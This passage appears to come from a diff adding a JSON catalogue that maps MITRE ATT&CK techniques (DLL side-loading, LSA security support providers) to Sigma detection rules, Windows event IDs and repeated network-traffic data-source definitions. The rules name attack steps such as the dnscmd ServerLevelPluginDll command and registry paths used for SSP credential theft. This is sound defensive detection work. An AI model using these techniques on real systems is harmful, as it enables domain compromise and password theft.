plugin DLL via ServerLevelPluginDll parameter in Registry, which can be used to execute code in context of the DNS server (restart required)", + "references": [ + "https://medium.com/@esnesenon/feature-not-bug-dnsadmin-to-dc-compromise-in-one-line-a0f779b8dc83" + ], + "date": "2017/05/08", + "author": "Florian Roth", + "tags": [ + "attack.defense_evasion", + "attack.t1073" + ], + "detection": { + "condition": "1 of them" + }, + "fields": [ + "EventID", + "CommandLine", + "ParentCommandLine", + "Image", + "User", + "TargetObject" + ], + "falsepositives": [ + "unknown" + ], + "level": "high" + }, + { + "logsource": { + "product": "windows", + "service": "sysmon" + }, + "detection": { + "dnsregmod": { + "EventID": 13, + "TargetObject": "*\\services\\DNS\\Parameters\\ServerLevelPluginDll" + } + } + }, + { + "logsource": { + "category": "process_creation", + "product": "windows" + }, + "detection": { + "dnsadmin": { + "CommandLine": "dnscmd.exe /config /serverlevelplugindll *" + } + } + }, + { + "title": "Possible Process Hollowing Image Loading", + "id": "e32ce4f5-46c6-4c47-ba69-5de3c9193cd7", + "status": "experimental", + "description": "Detects Loading of samlib.dll, WinSCard.dll from untypical process e.g. 
through process hollowing by Mimikatz", + "references": [ + "https://cyberwardog.blogspot.com/2017/03/chronicles-of-threat-hunter-hunting-for.html" + ], + "author": "Markus Neis", + "date": "2018/01/07", + "tags": [ + "attack.defense_evasion", + "attack.t1073" + ], + "logsource": { + "product": "windows", + "service": "sysmon" + }, + "detection": { + "selection": { + "EventID": 7, + "Image": [ + "*\\notepad.exe" + ], + "ImageLoaded": [ + "*\\samlib.dll", + "*\\WinSCard.dll" + ] + }, + "condition": "selection" + }, + "falsepositives": [ + "Very likely, needs more tuning" + ], + "level": "high" + }, + { + "title": "Executable used by PlugX in Uncommon Location - Sysmon Version", + "id": "aeab5ec5-be14-471a-80e8-e344418305c2", + "status": "experimental", + "description": "Detects the execution of an executable that is typically used by PlugX for DLL side loading started from an uncommon location", + "references": [ + "http://www.hexacorn.com/blog/2016/03/10/beyond-good-ol-run-key-part-36/", + "https://countuponsecurity.com/2017/06/07/threat-hunting-in-the-enterprise-with-appcompatprocessor/" + ], + "author": "Florian Roth", + "date": "2017/06/12", + "tags": [ + "attack.s0013", + "attack.defense_evasion", + "attack.t1073" + ], + "logsource": { + "category": "process_creation", + "product": "windows" + }, + "detection": { + "selection_cammute": { + "Image": "*\\CamMute.exe" + }, + "filter_cammute": { + "Image": "*\\Lenovo\\Communication Utility\\\\*" + }, + "selection_chrome_frame": { + "Image": "*\\chrome_frame_helper.exe" + }, + "filter_chrome_frame": { + "Image": "*\\Google\\Chrome\\application\\\\*" + }, + "selection_devemu": { + "Image": "*\\dvcemumanager.exe" + }, + "filter_devemu": { + "Image": "*\\Microsoft Device Emulator\\\\*" + }, + "selection_gadget": { + "Image": "*\\Gadget.exe" + }, + "filter_gadget": { + "Image": "*\\Windows Media Player\\\\*" + }, + "selection_hcc": { + "Image": "*\\hcc.exe" + }, + "filter_hcc": { + "Image": "*\\HTML Help Workshop\\\\*" 
+ }, + "selection_hkcmd": { + "Image": "*\\hkcmd.exe" + }, + "filter_hkcmd": { + "Image": [ + "*\\System32\\\\*", + "*\\SysNative\\\\*", + "*\\SysWowo64\\\\*" + ] + }, + "selection_mc": { + "Image": "*\\Mc.exe" + }, + "filter_mc": { + "Image": [ + "*\\Microsoft Visual Studio*", + "*\\Microsoft SDK*", + "*\\Windows Kit*" + ] + }, + "selection_msmpeng": { + "Image": "*\\MsMpEng.exe" + }, + "filter_msmpeng": { + "Image": [ + "*\\Microsoft Security Client\\\\*", + "*\\Windows Defender\\\\*", + "*\\AntiMalware\\\\*" + ] + }, + "selection_msseces": { + "Image": "*\\msseces.exe" + }, + "filter_msseces": { + "Image": [ + "*\\Microsoft Security Center\\\\*", + "*\\Microsoft Security Client\\\\*", + "*\\Microsoft Security Essentials\\\\*" + ] + }, + "selection_oinfo": { + "Image": "*\\OInfoP11.exe" + }, + "filter_oinfo": { + "Image": "*\\Common Files\\Microsoft Shared\\\\*" + }, + "selection_oleview": { + "Image": "*\\OleView.exe" + }, + "filter_oleview": { + "Image": [ + "*\\Microsoft Visual Studio*", + "*\\Microsoft SDK*", + "*\\Windows Kit*", + "*\\Windows Resource Kit\\\\*" + ] + }, + "selection_rc": { + "Image": "*\\rc.exe" + }, + "filter_rc": { + "Image": [ + "*\\Microsoft Visual Studio*", + "*\\Microsoft SDK*", + "*\\Windows Kit*", + "*\\Windows Resource Kit\\\\*", + "*\\Microsoft.NET\\\\*" + ] + }, + "condition": "( selection_cammute and not filter_cammute ) or ( selection_chrome_frame and not filter_chrome_frame ) or ( selection_devemu and not filter_devemu ) or ( selection_gadget and not filter_gadget ) or ( selection_hcc and not filter_hcc ) or ( selection_hkcmd and not filter_hkcmd ) or ( selection_mc and not filter_mc ) or ( selection_msmpeng and not filter_msmpeng ) or ( selection_msseces and not filter_msseces ) or ( selection_oinfo and not filter_oinfo ) or ( selection_oleview and not filter_oleview ) or ( selection_rc and not filter_rc )" + }, + "fields": [ + "CommandLine", + "ParentCommandLine" + ], + "falsepositives": [ + "Unknown" + ], + "level": "high" + 
}, + { + "title": "DHCP Server Loaded the CallOut DLL", + "id": "13fc89a9-971e-4ca6-b9dc-aa53a445bf40", + "status": "experimental", + "description": "This rule detects a DHCP server in which a specified Callout DLL (in registry) was loaded", + "references": [ + "https://blog.3or.de/mimilib-dhcp-server-callout-dll-injection.html", + "https://technet.microsoft.com/en-us/library/cc726884(v=ws.10).aspx", + "https://msdn.microsoft.com/de-de/library/windows/desktop/aa363389(v=vs.85).aspx" + ], + "date": "2017/05/15", + "author": "Dimitrios Slamaris", + "tags": [ + "attack.defense_evasion", + "attack.t1073" + ], + "logsource": { + "product": "windows", + "service": "system" + }, + "detection": { + "selection": { + "EventID": 1033 + }, + "condition": "selection" + }, + "falsepositives": [ + "Unknown" + ], + "level": "critical" + }, + { + "title": "DHCP Server Error Failed Loading the CallOut DLL", + "id": "75edd3fd-7146-48e5-9848-3013d7f0282c", + "description": "This rule detects a DHCP server error in which a specified Callout DLL (in registry) could not be loaded", + "status": "experimental", + "references": [ + "https://blog.3or.de/mimilib-dhcp-server-callout-dll-injection.html", + "https://technet.microsoft.com/en-us/library/cc726884(v=ws.10).aspx", + "https://msdn.microsoft.com/de-de/library/windows/desktop/aa363389(v=vs.85).aspx" + ], + "date": "2017/05/15", + "modified": "2019/07/17", + "tags": [ + "attack.defense_evasion", + "attack.t1073" + ], + "author": "Dimitrios Slamaris, @atc_project (fix)", + "logsource": { + "product": "windows", + "service": "system" + }, + "detection": { + "selection": { + "EventID": [ + 1031, + 1032, + 1034 + ], + "Source": "Microsoft-Windows-DHCP-Server" + }, + "condition": "selection" + }, + "falsepositives": [ + "Unknown" + ], + "level": "critical" + }, + { + "title": "DNS Server Error Failed Loading the ServerLevelPluginDLL", + "id": "cbe51394-cd93-4473-b555-edf0144952d9", + "description": "This rule detects a DNS server error in 
which a specified plugin DLL (in registry) could not be loaded", + "status": "experimental", + "date": "2017/05/08", + "references": [ + "https://medium.com/@esnesenon/feature-not-bug-dnsadmin-to-dc-compromise-in-one-line-a0f779b8dc83", + "https://technet.microsoft.com/en-us/library/cc735829(v=ws.10).aspx", + "https://twitter.com/gentilkiwi/status/861641945944391680" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1073" + ], + "author": "Florian Roth", + "logsource": { + "product": "windows", + "service": "dns-server" + }, + "detection": { + "selection": { + "EventID": [ + 150, + 770 + ] + }, + "condition": "selection" + }, + "falsepositives": [ + "Unknown" + ], + "level": "critical" + }, + { + "title": "Suspicious GUP Usage", + "id": "0a4f6091-223b-41f6-8743-f322ec84930b", + "description": "Detects execution of the Notepad++ updater in a suspicious directory, which is often used in DLL side-loading attacks", + "status": "experimental", + "references": [ + "https://www.fireeye.com/blog/threat-research/2018/09/apt10-targeting-japanese-corporations-using-updated-ttps.html" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1073" + ], + "author": "Florian Roth", + "date": "2019/02/06", + "logsource": { + "category": "process_creation", + "product": "windows" + }, + "detection": { + "selection": { + "Image": "*\\GUP.exe" + }, + "filter": { + "Image": [ + "C:\\Users\\\\*\\AppData\\Local\\Notepad++\\updater\\gup.exe", + "C:\\Users\\\\*\\AppData\\Roaming\\Notepad++\\updater\\gup.exe", + "C:\\Program Files\\Notepad++\\updater\\gup.exe", + "C:\\Program Files (x86)\\Notepad++\\updater\\gup.exe" + ] + }, + "condition": "selection and not filter" + }, + "falsepositives": [ + "Execution of tools named GUP.exe and located in folders different than Notepad++\\updater" + ], + "level": "high" + }, + [ + "5156", + "Windows Firewall" + ], + [ + "4688", + "Process Execution" + ], + [ + "Sysmon - ID 7", + "Loaded DLLs" + ], + [ + "Sysmon - ID 7", + "Loaded DLLs" + ], + [ + 
"5156", + "Windows Firewall" + ], + [ + "4688", + "Process Execution" + ] + ], + "external_reference": [ + "http://researchcenter.paloaltonetworks.com/2017/02/unit42-menupass-returns-new-malware-new-attacks-japanese-academics-organizations/", + "https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf", + "https://www.cybereason.com/blog/operation-cobalt-kitty-apt", + "https://researchcenter.paloaltonetworks.com/2016/01/new-attacks-linked-to-c0d0s0-group/", + "https://documents.trendmicro.com/assets/tech-brief-untangling-the-patchwork-cyberespionage-group.pdf", + "https://www.fireeye.com/blog/threat-research/2014/04/new-zero-day-exploit-targeting-internet-explorer-versions-9-through-11-identified-in-targeted-attacks.html", + "https://www.secureworks.com/research/bronze-union", + "https://www.fireeye.com/blog/threat-research/2014/06/clandestine-fox-part-deux.html", + "https://www.welivesecurity.com/2019/03/20/fake-or-fake-keeping-up-with-oceanlotus-decoys/", + "https://securelist.com/luckymouse-hits-national-data-center/86083/", + "https://cdn2.hubspot.net/hubfs/3354902/Cybereason%20Labs%20Analysis%20Operation%20Cobalt%20Kitty.pdf", + "https://www.secureworks.com/research/threat-group-3390-targets-organizations-for-cyberespionage" + ] + }, + { + "technique_id": "T1011", + "command_list": [], + "commands": [], + "parsed_datasets": [], + "queries": [], + "possible_detections": [ + { + "title": "Security Support Provider (SSP) added to LSA configuration", + "id": "eeb30123-9fbd-4ee8-aaa0-2e545bbed6dc", + "status": "experimental", + "description": "Detects the addition of a SSP to the registry. 
Upon a reboot or API call, SSP DLLs gain access to encrypted and plaintext passwords stored in Windows.", + "references": [ + "https://attack.mitre.org/techniques/T1101/", + "https://powersploit.readthedocs.io/en/latest/Persistence/Install-SSP/" + ], + "tags": [ + "attack.persistence", + "attack.t1011" + ], + "author": "iwillkeepwatch", + "date": "2019/01/18", + "logsource": { + "product": "windows", + "service": "sysmon" + }, + "detection": { + "selection_registry": { + "EventID": 13, + "TargetObject": [ + "HKLM\\System\\CurrentControlSet\\Control\\Lsa\\Security Packages", + "HKLM\\System\\CurrentControlSet\\Control\\Lsa\\OSConfig\\Security Packages" + ] + }, + "exclusion_images": [ + { + "Image": "C:\\Windows\\system32\\msiexec.exe" + }, + { + "Image": "C:\\Windows\\syswow64\\MsiExec.exe" + } + ], + "condition": "selection_registry and not exclusion_images" + }, + "falsepositives": [ + "Unlikely" + ], + "level": "critical" + }, + [ + "4688", + "Process Execution" + ], + [ + "4688 ", + "Process CMD Line" + ], + [ + "5156", + "Windows Firewall" + ], + [ + "User interface" + ], + [ + "4688", + "Process Execution" + ], + [ + "4688 ", + "Process CMD Line" + ], + [ + "5156", + "Windows Firewall" + ], + [ + "User interface" + ], + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "attempted connection to", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "attempted connection to", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "attempted connection to", + "target_data_element": "host" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "attempted connection from", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "attempted connection from", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "attempted connection from", + "target_data_element": "host" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "connected to", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "connected to", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "connected to", + "target_data_element": "host" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "connected from", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "connected from", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "connected from", + "target_data_element": "host" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "user", + "relationship": "connected to", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "user", + "relationship": "connected to", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "user", + "relationship": "connected to", + "target_data_element": "host" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "user", + "relationship": "connected from", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "user", + "relationship": "connected from", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "user", + "relationship": "connected from", + "target_data_element": "host" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "attempted to bind on", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "bound to", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "permitted listener on", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "permitted listener on", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "permitted listener on", + "target_data_element": "process" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "attempted to listen on", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "listened on", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked port bind on", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked port bind on", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked port bind on", + "target_data_element": "process" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked connection to", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked connection to", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked connection to", + "target_data_element": "process" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked connection from", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked connection from", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked connection from", + "target_data_element": "process" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked connection to", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked connection to", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked listener on", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked listener on", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked listener on", + "target_data_element": "process" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
